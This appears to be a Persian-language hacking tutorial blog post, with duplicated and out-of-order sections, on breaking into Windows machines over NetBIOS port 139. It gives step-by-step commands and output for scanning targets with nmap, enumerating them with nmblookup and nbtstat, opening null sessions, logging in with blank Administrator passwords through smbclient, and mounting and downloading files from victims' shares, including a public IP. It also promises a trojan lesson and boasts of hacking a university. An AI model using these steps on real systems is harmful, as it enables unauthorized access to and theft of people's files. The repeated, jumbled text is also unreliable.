۲- قدم دوم گرفتن NetbiosName های هدفه. بدون این اسمها ما نمیتونیم هیچ جور اطلاعاتی از هدف بگیریم. از اونجایی که مایکروسافت سعی کرده همه کارها رو ساده کنه، ویندوز های رو شبکه Netbios به جای Ip Address از اسم استفاده میکنن!! خب اینجا لازمه از یه Netbios Scanner یا Share Scanner استفاده کنیم. معمولا رو هر Description یی دستور nmblookup پیدا میشه - که خیلی شبیه nbtstat ویندوزه - رو لینوکس کار میکنه. من شخصا خیلی از nmblookup خوشم نمیاد چون Share Scanner های بسیار بهتری هستن ! :) به هر صورت من اینجا از nmblookup استفاده میکنم . شکل کلی دستور اینه : nmblookup –A . این flag ه A باعث میشه که nmblookup بتونه Query بهتری انجام بده . حالا رو هدفهوم امتحان میکنیم :
# nmblookup –A 192.168.3.2
و جواب میگیرم:
Looking up status of 192.168.3.2
ARMINLAPTOP <00> - B < ACTIVE>
WORKGROUP <00> - < GROUP> B < ACTIVE>
ARMINLAPTOP <03> - B < ACTIVE>
ARMINLAPTOP <20> - B < ACTIVE>
WORKGROUP <1e> - < GROUP> B < ACTIVE>
ADMINISTRATOR <03> - B < ACTIVE>
WORKGROUP <1d> - B < ACTIVE>
..__MSBROWSE__. <01> - < GROUP> B < ACTIVE>
همه چیز مشخصه نه ؟ اسم کامپیوتر ARMINLAPTOP , گروه کامپیوتر WORKGROUP و کاربر فعال Administrator هست :)
۳- بگذارین قبل از قسمت سوم کار یکمی در مورد ویندوز ها صحبت کنیم. Netbios به طور کلی روی همه ویندوز ها به نوعی خطر ایجاد میکنه. رو ویندوز های سری 2000 به بالا همه پارتیشن های سیستم Share شده اند و با پسوردی که Administrator دارد، باز میشن. خیلی از کاربران تازه کار هم پسورد Administrator رو خالی میگذارن. به نظر من این سری ویندوز ها بیشتر در خطر هستند. رو ویندوز های 9x هیچ فایلی به طور Default Share نشده، ولی خوب اگر بشه ممکنه بتونیم از طریقش بدون پسورد وارد فایل سیستم بشیم :) حتی اگر پسورد Administrator رو هم نداشته باشیم Anonymous Login میتونه اطلاعات خیلی مفیدی بهموم بده :) حالا میخواهیم لیست Share ها رو بدست بیاوریم . ( در درس قبلی برای ویندوز از دستور net view برای همینکار استفاده کردیم) توجه کنید که کرنل باید Network File System و Samba File System رو ساپرت کرده باشه : در این مثال در نظر گرفتم که پسورد Administrator خالیه ! :) مینویسم:
# smbclient –Uadministrator –LARMINLAPTOP –I 192.168.3.2
نتیجه دستور به صورت زیر است:
added interface ip=192.168.3.1 bcast=192.168.3.255 nmask=255.255.255.0
Password:
Domain=[WORKGROUP] OS=[Windows 5.0] Server=[Windows 2000 LAN Manager]
Sharename Type Comment
--------- ---- -------
IPC$ IPC Remote IPC
D$ Disk Default share
ADMIN$ Disk Remote Admin
C$ Disk Default share
Armin Disk
Server Comment
--------- -------
ARMINDESKTOP Samba 2.2.3a
ARMINLAPTOP
Workgroup Master
--------- -------
WORKGROUP ARMINLAPTOP
خب میبینید ؟ :) هر دو پارتیشن ARMINLAPTOP در اختیار شماست ! :) همچنین کامپیوتر هایی که باهاش در ارتباط هستند رو هم میبینیم. در این مثال ملاحظه میفرمایید که Armin به عنوان Disk بهاشتراک گذاشته شده. خب قبل از اینکه بریم سراغ بقیه کار یک بار هم Anonymous رو امتحان میکنیم ( یه چیزی مثل Null Session ):
# smbclient -LARMINLAPTOP -I 192.168.3.2
و جواب:
added interface ip=192.168.3.1 bcast=192.168.3.255 nmask=255.255.255.0
Password:
Anonymous login successful
Domain=[WORKGROUP] OS=[Windows 5.0] Server=[Windows 2000 LAN Manager]
Sharename Type Comment
--------- ---- -------
Error returning browse list: NT_STATUS_ACCESS_DENIED
Server Comment
--------- -------
ARMINDESKTOP Samba 2.2.3a
ARMINLAPTOP
Workgroup Master
--------- -------
WORKGROUP ARMINLAPTOP
خب باز هم یه اطلاعاتی پیدا میکنیم ! :) با اینکه فایلهای Share شده رو نمیبینیم، به هر صورت از هیچی بهتره ! شاید یه جای دیگه به درد بخوره !
۴- خب حالا سعی میکنیم که این Share هارو Mount کنیم. مینویسیم:
# smbclient //ARMINLAPTOP/Armin -I 192.168.3.2
و جواب میشنوم:
added interface ip=192.168.3.1 bcast=192.168.3.255 nmask=255.255.255.0
Password:
session setup failed: NT_STATUS_LOGON_FAILURE
خب ! :) Share توسط Password محافظت میشه ! :) کار زیادی نمیتونیم انجام بدیم. مثلا میتونیم همین Null پسورد رو امتحان کنم، ولی خب اگر با Win9x طرف باشیم کاری نمیشه کرد . حالا رو ویندوز 2000 به بالا کار میکنیم. روی اینکه کاربر ناشی باشه و پسورد Administrator رو خالی گذاشته باشه خیلی حساب کردیم :
# smbclient //ARMINLAPTOP/Armin -I 192.168.3.2 -Uadministrator
و جواب میشنوم:
added interface ip=192.168.3.1 bcast=192.168.3.255 nmask=255.255.255.0
Password:
Domain=[WORKGROUP] OS=[Windows 5.0] Server=[Windows 2000 LAN Manager]
smb: \>
این
smb: \> ls
و جواب میشنوم:
. DA 0 Sat Feb 8 05:34:11 2003
.. DA 0 Sat Feb 8 05:34:11 2003
Blcorp D 0 Sat Feb 8 03:05:51 2003
47943 blocks of size 65536. 8261 blocks available
و ادامه میدم به صورت زیر:
smb: \> cd Blcorp
smb: \Blcorp\> ls
. D 0 Sat Feb 8 03:05:51 2003
.. D 0 Sat Feb 8 03:05:51 2003
WLTrial.exe A 2321412 Mon Apr 29 14:18:58 2002
47943 blocks of size 65536. 8261 blocks available
smb: \Blcorp\> get WLTrial.exe
getting file WLTrial.exe of size 2321412 as WLTrial.exe (892.2 kb/s) ...
smb: \Blcorp\>
شما میتونید از دستور Pull برای فرستادن فایل و get برای گرفتن فایل استفاده کنید :) فایلها گرفته شده در دایرکتوری فعلی شما ذخیره میشوند . قسمت امیدوار کننده کار اینه که خیلی از مردم از ویندوز استفاده میکنن و اکثرشون حتی نمیدونن که همه فایل سیستم هاشون بدون پسورد به راحتی قابل دسترسه. خب ما هم اینهارو یاد نمیگیریم که دور دنیا بچرخیم و فایلهای مردم رو پاک کنیم !
◊ FAQ
- آیا Samba به نا امنی Netbios ویندوز است ؟
نه اصلا ! Samba یک برنامه پرقدرته , اگر خوب Config شه احتمال هک شدنش بسیار پایینه ! فرض کنید از طریق سیستمعامل ویندوز میخوام این کامپیوتری که Samba داره رو هک کنم. دستور تایپ شده و جواب بدست اومده بیانگر امنیت Samba ست:
C:\>nbtstat -A 192.168.3.1
Local Area Connection 2:
Node IpAddress: [192.168.3.2] Scope Id: []
Host not found
- یک نفوذ بدون مشکل جدی چقدر طول میکشه ؟
موقع هک کردن Client باید سریع باشید ! کل این مراحل حداکثر 3 یا 4 دقیقه وقت میگیره , فقط نوشتنش طول میکشه! :)
- چرا هک کردن Netbios از طریق Unix/Linux راحت تر از Windows هست ؟
خب خیلی سریع تره، ابزارهای بهتر و از همه مهمتر اینکه خودتون در معرض خطر نیستید :)
◊ Samba چیست؟
احتمالا میدونید که Netbios پرتکل معروف مایکروسافت برای ارتباط ویندوز ها با هم و احتمالا Share کردن پرینتر یا فایله. همچنین وقتی که بحث نفوذ به Client و بر بعضی مواقع Server ها پیش میاد، Netbios یکی از اولین انتخاب هاست. ما در این مقاله سعی میکنیم از این ضعف سیستم عاملهای مایکروسافت سوءاستفاده کنیم.
سیستم عاملهای بر پاییه یونیکس مثل لینوکس برای Share کردن فایلها و پرینتر ها از طریق Netbios از پرتکل Smb/Cifs که توسط برنامه Samba باز میشه استفاده میکنن و از این طریق لینوکس میتونه Share های کامپیوتر های ویندوز رو Mount کنه. (اگه کاربر لینوکس هستید، نمیتونید روشهایی که در درس قبلی برای ویندوز ذکر شده استفاده کنید، بلکه باید از Samba بهره گیرید. اما طرف مقابل که قرار است هک بشه، سیستمعاملش رو فرض میکنیم که ویندوزه. پس ما میخوایم با لینوکس یک سیستمعامل ویندوز را که ۱۳۹ باز داره، هک کنیم) بی شک Netbios عمومی ترین مشکل امنیتی ویندوزه که استفاده ازش چندان مشکل نیست.
خب ! همون طور که گفتم ما برای این کار از Samba استفاده میکنیم. من اینجا چیزی در مورد Samba نمینویسم و بنا کار رو بر این میگذارم که تا حدودی میتونید با Samba کار کنید . اگر احتمالا مشکلی دارید میتونید به Samba.org سر بزنید و در Documention ها دنبال راهنما باشید :) به طور کل اگر نمیدونید چطور از Samba استفاده کنید بهتره که کاری با کامپیوتر های مردم نداشته باشید ! :)
◊ چگونه با پورت ۱۳۹ صحبت کنیم؟
۱- اولین قدم پیدا کردن کامپیوتریه که پرت 139 و 137 که پرت Netbios هست رو باز کرده باشه. برای اینکار از Nmap استفاده میکنیم. Nmap معمولا رو همه Description های فعلی پیدا میشه. میخوام به کمک Nmap تست کنم که از ip شماره 192.168.3.50 تا 192.168.3.1 کدامها پورت ۱۳۹ باز دارند. برای این کار مینویسم:
# nmap -sS -O 192.168.3.1-50 -p 139
و جواب میشنوم:
st 1 open and 1 closed TCP port
Interesting ports on (192.168.3.2):
Port State Service
139/tcp open netbios-ssn
Remote OS guesses: Windows Millennium Edition (Me), Win 2000,
or WinXP, MS Windows2000 Professional RC1/W2K Advance Server Beta3
باید اینو بهتون بگم که من دارم این کار رو روی Lan انجام میدم و همه Ip ها Static هستند. ولی خب کار رو جوری در نظر میگیرم که گویا نمیدونم چه Host های اینجا وجود دارن :) 192.168.3.1 یک SuSE 8 هست که کار رو از طریقش انجام میدیم و 192.168.3.2 یک win2kpro sp2 هست که قربانیه و البته FireWall نداره :) من اینجا از آیپی های کلاس C استفاده میکنم ممکنه وضع شما تو اینترنت فرق کنه، ولی خب نحوه کار تغییر نمیکنه. حالا هدف رو پیدا کردیم، هدف ما 192.168.3.2 هست .
۲- قدم دوم گرفتن NetbiosName های هدفه. بدون این اسمها ما نمیتونیم هیچ جور اطلاعاتی از هدف بگیریم. از اونجایی که مایکروسافت سعی کرده همه کارها رو ساده کنه، ویندوز های رو شبکه Netbios به جای Ip Address از اسم استفاده میکنن!! خب اینجا لازمه از یه Netbios Scanner یا Share Scanner استفاده کنیم. معمولا رو هر Description یی دستور nmblookup پیدا میشه - که خیلی شبیه nbtstat ویندوزه - رو لینوکس کار میکنه. من شخصا خیلی از nmblookup خوشم نمیاد چون Share Scanner های بسیار بهتری هستن ! :) به هر صورت من اینجا از nmblookup استفاده میکنم . شکل کلی دستور اینه : nmblookup –A . این flag ه A باعث میشه که nmblookup بتونه Query بهتری انجام بده . حالا رو هدفهوم امتحان میکنیم :
# nmblookup –A 192.168.3.2
و جواب میگیرم:
Looking up status of 192.168.3.2
ARMINLAPTOP <00> - B < ACTIVE>
WORKGROUP <00> - < GROUP> B < ACTIVE>
ARMINLAPTOP <03> - B < ACTIVE>
ARMINLAPTOP <20> - B < ACTIVE>
WORKGROUP <1e> - < GROUP> B < ACTIVE>
ADMINISTRATOR <03> - B < ACTIVE>
WORKGROUP <1d> - B < ACTIVE>
..__MSBROWSE__. <01> - < GROUP> B < ACTIVE>
همه چیز مشخصه نه ؟ اسم کامپیوتر ARMINLAPTOP , گروه کامپیوتر WORKGROUP و کاربر فعال Administrator هست :)
۳- بگذارین قبل از قسمت سوم کار یکمی در مورد ویندوز ها صحبت کنیم. Netbios به طور کلی روی همه ویندوز ها به نوعی خطر ایجاد میکنه. رو ویندوز های سری 2000 به بالا همه پارتیشن های سیستم Share شده اند و با پسوردی که Administrator دارد، باز میشن. خیلی از کاربران تازه کار هم پسورد Administrator رو خالی میگذارن. به نظر من این سری ویندوز ها بیشتر در خطر هستند. رو ویندوز های 9x هیچ فایلی به طور Default Share نشده، ولی خوب اگر بشه ممکنه بتونیم از طریقش بدون پسورد وارد فایل سیستم بشیم :) حتی اگر پسورد Administrator رو هم نداشته باشیم Anonymous Login میتونه اطلاعات خیلی مفیدی بهموم بده :) حالا میخواهیم لیست Share ها رو بدست بیاوریم . ( در درس قبلی برای ویندوز از دستور net view برای همینکار استفاده کردیم) توجه کنید که کرنل باید Network File System و Samba File System رو ساپرت کرده باشه : در این مثال در نظر گرفتم که پسورد Administrator خالیه ! :) مینویسم:
# smbclient –Uadministrator –LARMINLAPTOP –I 192.168.3.2
نتیجه دستور به صورت زیر است:
added interface ip=192.168.3.1 bcast=192.168.3.255 nmask=255.255.255.0
Password:
Domain=[WORKGROUP] OS=[Windows 5.0] Server=[Windows 2000 LAN Manager]
Sharename Type Comment
--------- ---- -------
IPC$ IPC Remote IPC
D$ Disk Default share
ADMIN$ Disk Remote Admin
C$ Disk Default share
Armin Disk
Server Comment
--------- -------
ARMINDESKTOP Samba 2.2.3a
ARMINLAPTOP
Workgroup Master
--------- -------
WORKGROUP ARMINLAPTOP
خب میبینید ؟ :) هر دو پارتیشن ARMINLAPTOP در اختیار شماست ! :) همچنین کامپیوتر هایی که باهاش در ارتباط هستند رو هم میبینیم. در این مثال ملاحظه میفرمایید که Armin به عنوان Disk بهاشتراک گذاشته شده. خب قبل از اینکه بریم سراغ بقیه کار یک بار هم Anonymous رو امتحان میکنیم ( یه چیزی مثل Null Session ):
# smbclient -LARMINLAPTOP -I 192.168.3.2
و جواب:
added interface ip=192.168.3.1 bcast=192.168.3.255 nmask=255.255.255.0
Password:
Anonymous login successful
Domain=[WORKGROUP] OS=[Windows 5.0] Server=[Windows 2000 LAN Manager]
Sharename Type Comment
--------- ---- -------
Error returning browse list: NT_STATUS_ACCESS_DENIED
Server Comment
--------- -------
ARMINDESKTOP Samba 2.2.3a
ARMINLAPTOP
Workgroup Master
--------- -------
WORKGROUP ARMINLAPTOP
خب باز هم یه اطلاعاتی پیدا میکنیم ! :) با اینکه فایلهای Share شده رو نمیبینیم، به هر صورت از هیچی بهتره ! شاید یه جای دیگه به درد بخوره !
۴- خب حالا سعی میکنیم که این Share هارو Mount کنیم. مینویسیم:
# smbclient //ARMINLAPTOP/Armin -I 192.168.3.2
و جواب میشنوم:
added interface ip=192.168.3.1 bcast=192.168.3.255 nmask=255.255.255.0
Password:
session setup failed: NT_STATUS_LOGON_FAILURE
خب ! :) Share توسط Password محافظت میشه ! :) کار زیادی نمیتونیم انجام بدیم. مثلا میتونیم همین Null پسورد رو امتحان کنم، ولی خب اگر با Win9x طرف باشیم کاری نمیشه کرد . حالا رو ویندوز 2000 به بالا کار میکنیم. روی اینکه کاربر ناشی باشه و پسورد Administrator رو خالی گذاشته باشه خیلی حساب کردیم :
# smbclient //ARMINLAPTOP/Armin -I 192.168.3.2 -Uadministrator
و جواب میشنوم:
added interface ip=192.168.3.1 bcast=192.168.3.255 nmask=255.255.255.0
Password:
Domain=[WORKGROUP] OS=[Windows 5.0] Server=[Windows 2000 LAN Manager]
smb: \>
این
smb: \> ls
و جواب میشنوم:
. DA 0 Sat Feb 8 05:34:11 2003
.. DA 0 Sat Feb 8 05:34:11 2003
Blcorp D 0 Sat Feb 8 03:05:51 2003
47943 blocks of size 65536. 8261 blocks available
و ادامه میدم به صورت زیر:
smb: \> cd Blcorp
smb: \Blcorp\> ls
. D 0 Sat Feb 8 03:05:51 2003
.. D 0 Sat Feb 8 03:05:51 2003
WLTrial.exe A 2321412 Mon Apr 29 14:18:58 2002
47943 blocks of size 65536. 8261 blocks available
smb: \Blcorp\> get WLTrial.exe
getting file WLTrial.exe of size 2321412 as WLTrial.exe (892.2 kb/s) ...
smb: \Blcorp\>
شما میتونید از دستور Pull برای فرستادن فایل و get برای گرفتن فایل استفاده کنید :) فایلها گرفته شده در دایرکتوری فعلی شما ذخیره میشوند . قسمت امیدوار کننده کار اینه که خیلی از مردم از ویندوز استفاده میکنن و اکثرشون حتی نمیدونن که همه فایل سیستم هاشون بدون پسورد به راحتی قابل دسترسه. خب ما هم اینهارو یاد نمیگیریم که دور دنیا بچرخیم و فایلهای مردم رو پاک کنیم !
◊ FAQ
- آیا Samba به نا امنی Netbios ویندوز است ؟
نه اصلا ! Samba یک برنامه پرقدرته , اگر خوب Config شه احتمال هک شدنش بسیار پایینه ! فرض کنید از طریق سیستمعامل ویندوز میخوام این کامپیوتری که Samba داره رو هک کنم. دستور تایپ شده و جواب بدست اومده بیانگر امنیت Samba ست:
C:\>nbtstat -A 192.168.3.1
Local Area Connection 2:
Node IpAddress: [192.168.3.2] Scope Id: []
Host not found
- یک نفوذ بدون مشکل جدی چقدر طول میکشه ؟
موقع هک کردن Client باید سریع باشید ! کل این مراحل حداکثر 3 یا 4 دقیقه وقت میگیره , فقط نوشتنش طول میکشه! :)
- چرا هک کردن Netbios از طریق Unix/Linux راحت تر از Windows هست ؟
خب خیلی سریع تره، ابزارهای بهتر و از همه مهمتر اینکه خودتون در معرض خطر نیستید :)
کوچیک ::: دوشنبه 86/7/23::: ساعت 3:0 صبح
نظرات دیگران: نظر
- خلاصه درس: در این درس با پورت ۱۳۹ ( NetBIOS ) آشنا میشویم.
◊ چند نکته
۱- در تمام درسهایی که با عنوان صحبت با پورتها شروع شده است، فقط بحث ارتباط استاندارد با آنها رو گفتهام. یعنی نخواستم درباره اینکه چگونه از نقاط ضعف آنها ( اصطلاحا Vulnerability ) سوءاستفاده کنیم، سخنی به میان بیارم. بحث استفاده از Vulnerability ها و اصطلاحا exploit کردن نرمافزارهای هر پورت بعدا مطرح خواهد شد. در مورد این درس هم همین نکته را رعایت کردهام. همین بحث netbios بعدا کاملتر خواهد شد.
۲- اگه یادتون باشه قبلا گفتم که باید سه مورد را خودتون شروع کنید به یاد گرفتن که عبارت بودند از C ، TCP/IP ، Linux من فرض میکنم که شما در این مدت این سه تا رو یاد گرفتین و کم کمک وارد مباحث مربوطه خواهم شد. اگه هنوز اطلاعاتتون کامل نشده، یوخته عجله کنین.
۳- مثال مهندسی اجتماعی رو که تو درس ۱۴ برای یاهو گفته بودم، غیر فعال کردم که دیگه user جدید قبول نکنه.
۴- سعی میکنم تو یکی از درسهای بعدی طریقه نصب لینوکس و نیز نصب مودم رو در این سیستمعامل آموزش بدم چون خیلی ازم میپرسن.
◊ NetBIOS چیست؟
NetBIOS مخفف عبارت Network Basic Input/Output System است. NetBIOS ابزاری است که اجازه به اشتراک گذاشتن منابع رو به ما میده. ما برای به اشتراک گذاشتن فایلها و یا پرینتر میتونیم از این پروتکل استفاده کنیم. نکته مهم این است که NetBIOS فقط در سیستمعامل ویندوز معنی داره (اگرچه ابزارهایی مثل Samba در لینوکس میتونن اونو شبیه سازی کنن ولی بحث ما خود پروتکل NetBIOS است). وقتی NetBIOS در ویندوز فعال باشد، بلافاصله سه تا پورت برای استفاده باز میشوند. پورت مهم و اصلی پورت ۱۳۹ در tcp است که NetBIOS را هم با این پورت میشناسن. دو پورت دیگر، از نوع udp هستند و عبارتند از پورت ۱۳۷ برای name service و پورت ۱۳۹ برای Datagram service . وقتی قرار باشه که یک سیستمعامل ویندوز هک بشه ( خصوصا اگه کلاینت باشه ) یکی از اولین مواردی که به ذهن میرسه، استفاده از NetBIOS ه.
حالا ببینیم منظور از به اشتراک گذاشتن (Sharing) در مورد فایلها و پرینترها چیست؟
به اشتراک گذاشتن در مورد فایلها یعنی قرار دادن تعدادی فایل در یک کامپیوتر خاص به طوریکه توسط سایر کامپیوترها قابل دسترسی و استفاده باشه. در مورد پرینتر به اشتراک گذاشتن یعنی طوری چاپگر متصل به یک کامپیوتر را تنظیم کنیم که توسط سایر کامپیوترها هم قابل استفاده باشه. با توجه به اینکه در سیستمعاملهای ویندوز به صورت پیشفرض NetBIOS فعال است، پس میتوان به تعدادی از فایلها و فولدرهای تعدادی از کامپیوترهای روی شبکه دسترسی داشت و فایلها را خواند و حتی کپی یا پاک کرد.
◊ چگونه با پورت ۱۳۹ صحبت کنیم؟
۱- اولین کاری که میکنیم این است که برای پورت ۱۳۹ پورت اسکن میکنیم تا ip هایی را که پورت ۱۳۹ در آنها باز است، پیدا کنیم. من این کار را با nmap انجام میدم. فرض کنید که یک ip به شماره 217.218.84.29 را تست کرده و به نتیجه زیر برسم:
Interesting ports on HOME-TU6U0AV86Y (217.218.84.29):
Port State Service
139/tcp open netbios-ssn
Remote operating system guess: Windows Millenn... (Me), Win 2000, or WinXP
این خروجی اعلام میکند که پورت ۱۳۹ باز است. پس میشود از این ip استفاده کرد.
۲- حالا میخوام با این پورت ارتباط برقرار کنم. اصولا باید مثل سابق از telnet یا nc استفاده کنم ولی در مورد پورت ۱۳۹ روش ارتباطی فرق میکند. کامنت پرامت را باز کرده و دستور زیر را مینویسم:
nbtstat -A 217.218.84.29
دستور nbtstat یک ابزار خاص برای کار با NetBIOS است. دقت کنید که از پارامتر A- با ip مربوطه استفاده کردم. (دستور nbtstat دارای پارامترهای بسیاری است که اگه میخواین همه رو ببینین، بنویسین nbtstat و enter را بزنید.)
حالا بحث اینه که این دستور چه کاری میکنه و خروجی به چه صورتی است:
این دستور به ip مورد نظر وصل میشه و از اون میخواد لیست منابعی رو که به اشتراک گذاشته رو لیست کنه. در این حالت ۲ حالت ممکنه اتفاق بیوفته:
الف) مواجه با پیغام Host not found بشم. این یعنی اینکه نمیتونه لیست منابع را از اون کامپیوتر بگیره (یعنی NetBIOS غیر فعاله). یعنی اگرچه پورت ۱۳۹ بازه ولی قابل استفاده نیست.
ب) ارتباط برقرار بشه و لیست منابع اشتراکی لیست بشه:
NetBIOS Remote Machine Name Table
Name Type Status
---------------------------------------------
HOME-TU6U0AV86Y<00> UNIQUE Registered
MSHOME <00> GROUP Registered
HOME-TU6U0AV86Y<20> UNIQUE Registered
MSHOME <1E> GROUP Registered
MAC Address = 00-53-45-00-00-00
۳- در این نتایج چیزی که به درد میخوره، سطری است که <20> دارد. اگه <20> نباشد، یعنی نمیتونین از اشتراک گذاری فایل استفاده کنید ( به عبارت ساده تر بیخیال شو این کامپیوتر رو ! ). در این مثال ما این سطر را داشتیم پس ادامه میدهیم. حالا مینویسم:
net view \\217.218.84.29
حالا اگه گفتین چی میشه؟ درسته! دو حالت ممکنه اتفاق بیوفته:
الف) پیغام بیاد
System error 5 has occurred.
Access is denied.
این یعنی نمیتونین ادامه بدین. به عبارت دیگه ایست! ولی یه کاری میتونید بکنید و اون اینه که یه null session برقرار کنید با اون کامپیوتر. این حالت در مورد ویندوزهای سری NT جواب میده. مینویسید:
net use \\217.218.84.29\IPC$ "" /user:""
حالا چرا میگن null session ؟ دلیلش اینه که یک ارتباط برقرار کردم با اون ip بدون username و بدون password . حالا اگه این دستور جواب داد میتونم دوباره دستور net view \\217.218.84.29 را تکرار کنم.
ب) ممکنه دستور ذکر شده جواب بده و مثلا جواب بده:
Shared resources at \\217.218.84.29
Share name Type Used as Comment
------------------------------------------------
Printer Print Acrobat PDFWriter
Printer2 Print Acrobat Distiller
SharedDocs Disk
The command completed successfully.
عالیه. دقت کنید که در این کامپیوتر یک فایل (Disk) به اسم ShareDocs به اشتراک گذاشته شده (دو تای باقی برای پرینتر است). حالا که رسیدم به این اسم دیگه آخرین دستور را مینویسم.
۴- حالا وقتشه که واقعا عمل به اشتراک گذاشتن رو انجام بدیم. برای اینکار باید یک درایو انتخاب کنید. حتما میدونید که درایو چیه. وقتی شما My Computer را دابل کلیک کرده و باز میکنید، یک سری آیکون میبینید که هر کدام اسمی دارند. مثلا :A برای فلاپی و و و تا میرسید به cdrom که آخرین حرف را دارد. مثلا فرض کنید که :K باشه. حالا باید اسم درایو رو برای اشتراک گذاشتن انتخاب کنید. برای اینکار حرف بعدی در زبان انگلیسی رو به کار ببرید. چون در کامپیوتر من :K آخرین بود، من حرف بعدی یعنی :L را انتخاب میکنم و دستور زیر را مینویسم:
net use L: \\217.218.84.29\SharedDocs
به اسم درایو، ip و نام مربوطه که ShareDocs دقت کنید. چون من اصطلاحا به صورت null session دارم ارتباط میگیرم، ممکنه کار نکنه ولی اگه درست کار کنه جواب میشنوم:
The command completed successfully.
معرکه است!!! حالا My Computer رو باز کنید و ببینید که درایو جدید به لیست درایوها اضافه شده که میتونین مثل درایوهای معمولی با اون کار کنید و فایل کپی کنید و ...
۵- وقتی کار تموم شد میتونید درایو رو حذف کنید. برای اینکار میتونین روی درایو رایتکلیک کنید و Disconnect را انتخاب کنید. و یا اینکه از دستور
net use /delete L:
استفاده کنید.
◊ نکته نکته نکته
۱- یه روش جالب به جای مرحله ۴ در بالا اینه که مثلا در مرورگر یا در run بنویسید 217.218.84.29\\ که ip دارای اشتراک است و یا اینکه تایپ کنید SharedDocsت\217.218.84.29\\ که اصولا باید جواب بده ( ولی من خودم تست نکردم اینو ).
۲- من دارم به صورت استاندارد کار میکنم. بعدا خواهم گفت که چطوری میتونیم وقتی تو بعضی از مراحل متوقف میشیم، اونو دور بزنیم.
۳- NetBIOS فقط برای کلاینتها نیست. من خودم یکبار سایت دانشگاه رو با اون هک کردم. البته با exploit کردن که بعدا خواهم گفت.
۴- اگه دارید یک کلاینت رو هک میکنید، باید سریع عمل کنید تا قبل از اینکه طرف disconnect کنه کار شما تموم شده باشه.
۵- روشهای دیگری هم برای کار با NetBIOS هست که یکی از اون روشها استفاده از یک سری نرمافزارهای خاص است که تو درس بعدی توضیح میدم و نیز یک روش دیگه اعمال تغییرات در فایلهای HOST و LMHOST و استفاده از find در سیستمعامل ویندوز است. ولی چون این روش دنگ و فنگش زیاده، جالب نیست.
۶- برای اینکه بتونیم با NetBIOS کار کنیم، علاوه بر اینکه در کامپیوتر طرف مقابل باید فعال باشه، روی کامپیوتر خودمون هم فعال باشه. چون در حالت پیشفرض در کامپیوتر فعال است، معمولا مشکلی نیست.
◊ درس بعدی
درس بعدی هم در مورد همین NetBIOS است:
۱- چگونه از این امکان share یا به اشتراک گذاشتن، برای اجرای یک تروجان روی کامپیوتر قربانی استفاده کنیم.
۲- چگونه NetBIOS را فعال و غیر فعال کنیم.
۳- از چه ابزارهای دیگهای میتونیم استفاده کنیم.
◊ چند نکته
۱- در تمام درسهایی که با عنوان صحبت با پورتها شروع شده است، فقط بحث ارتباط استاندارد با آنها رو گفتهام. یعنی نخواستم درباره اینکه چگونه از نقاط ضعف آنها ( اصطلاحا Vulnerability ) سوءاستفاده کنیم، سخنی به میان بیارم. بحث استفاده از Vulnerability ها و اصطلاحا exploit کردن نرمافزارهای هر پورت بعدا مطرح خواهد شد. در مورد این درس هم همین نکته را رعایت کردهام. همین بحث netbios بعدا کاملتر خواهد شد.
۲- اگه یادتون باشه قبلا گفتم که باید سه مورد را خودتون شروع کنید به یاد گرفتن که عبارت بودند از C ، TCP/IP ، Linux من فرض میکنم که شما در این مدت این سه تا رو یاد گرفتین و کم کمک وارد مباحث مربوطه خواهم شد. اگه هنوز اطلاعاتتون کامل نشده، یوخته عجله کنین.
۳- مثال مهندسی اجتماعی رو که تو درس ۱۴ برای یاهو گفته بودم، غیر فعال کردم که دیگه user جدید قبول نکنه.
۴- سعی میکنم تو یکی از درسهای بعدی طریقه نصب لینوکس و نیز نصب مودم رو در این سیستمعامل آموزش بدم چون خیلی ازم میپرسن.
◊ NetBIOS چیست؟
NetBIOS مخفف عبارت Network Basic Input/Output System است. NetBIOS ابزاری است که اجازه به اشتراک گذاشتن منابع رو به ما میده. ما برای به اشتراک گذاشتن فایلها و یا پرینتر میتونیم از این پروتکل استفاده کنیم. نکته مهم این است که NetBIOS فقط در سیستمعامل ویندوز معنی داره (اگرچه ابزارهایی مثل Samba در لینوکس میتونن اونو شبیه سازی کنن ولی بحث ما خود پروتکل NetBIOS است). وقتی NetBIOS در ویندوز فعال باشد، بلافاصله سه تا پورت برای استفاده باز میشوند. پورت مهم و اصلی پورت ۱۳۹ در tcp است که NetBIOS را هم با این پورت میشناسن. دو پورت دیگر، از نوع udp هستند و عبارتند از پورت ۱۳۷ برای name service و پورت ۱۳۹ برای Datagram service . وقتی قرار باشه که یک سیستمعامل ویندوز هک بشه ( خصوصا اگه کلاینت باشه ) یکی از اولین مواردی که به ذهن میرسه، استفاده از NetBIOS ه.
حالا ببینیم منظور از به اشتراک گذاشتن (Sharing) در مورد فایلها و پرینترها چیست؟
به اشتراک گذاشتن در مورد فایلها یعنی قرار دادن تعدادی فایل در یک کامپیوتر خاص به طوریکه توسط سایر کامپیوترها قابل دسترسی و استفاده باشه. در مورد پرینتر به اشتراک گذاشتن یعنی طوری چاپگر متصل به یک کامپیوتر را تنظیم کنیم که توسط سایر کامپیوترها هم قابل استفاده باشه. با توجه به اینکه در سیستمعاملهای ویندوز به صورت پیشفرض NetBIOS فعال است، پس میتوان به تعدادی از فایلها و فولدرهای تعدادی از کامپیوترهای روی شبکه دسترسی داشت و فایلها را خواند و حتی کپی یا پاک کرد.
◊ چگونه با پورت ۱۳۹ صحبت کنیم؟
۱- اولین کاری که میکنیم این است که برای پورت ۱۳۹ پورت اسکن میکنیم تا ip هایی را که پورت ۱۳۹ در آنها باز است، پیدا کنیم. من این کار را با nmap انجام میدم. فرض کنید که یک ip به شماره 217.218.84.29 را تست کرده و به نتیجه زیر برسم:
Interesting ports on HOME-TU6U0AV86Y (217.218.84.29):
Port State Service
139/tcp open netbios-ssn
Remote operating system guess: Windows Millenn... (Me), Win 2000, or WinXP
این خروجی اعلام میکند که پورت ۱۳۹ باز است. پس میشود از این ip استفاده کرد.
۲- حالا میخوام با این پورت ارتباط برقرار کنم. اصولا باید مثل سابق از telnet یا nc استفاده کنم ولی در مورد پورت ۱۳۹ روش ارتباطی فرق میکند. کامنت پرامت را باز کرده و دستور زیر را مینویسم:
nbtstat -A 217.218.84.29
دستور nbtstat یک ابزار خاص برای کار با NetBIOS است. دقت کنید که از پارامتر A- با ip مربوطه استفاده کردم. (دستور nbtstat دارای پارامترهای بسیاری است که اگه میخواین همه رو ببینین، بنویسین nbtstat و enter را بزنید.)
حالا بحث اینه که این دستور چه کاری میکنه و خروجی به چه صورتی است:
این دستور به ip مورد نظر وصل میشه و از اون میخواد لیست منابعی رو که به اشتراک گذاشته رو لیست کنه. در این حالت ۲ حالت ممکنه اتفاق بیوفته:
